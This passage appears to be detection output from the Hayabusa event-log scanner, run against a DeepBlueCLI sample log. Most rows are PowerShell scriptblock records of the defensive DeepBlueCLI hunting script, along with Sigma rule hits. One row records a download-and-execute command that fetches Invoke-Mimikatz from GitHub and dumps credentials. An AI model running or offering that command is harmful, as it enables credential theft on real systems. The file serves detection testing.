""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.581 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:27.201 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:27.201 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:27.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:27.203 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:27.734 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:49.131 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:56.217 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:12.696 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:14.161 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:28.002 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.553 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.559 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:41:37.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
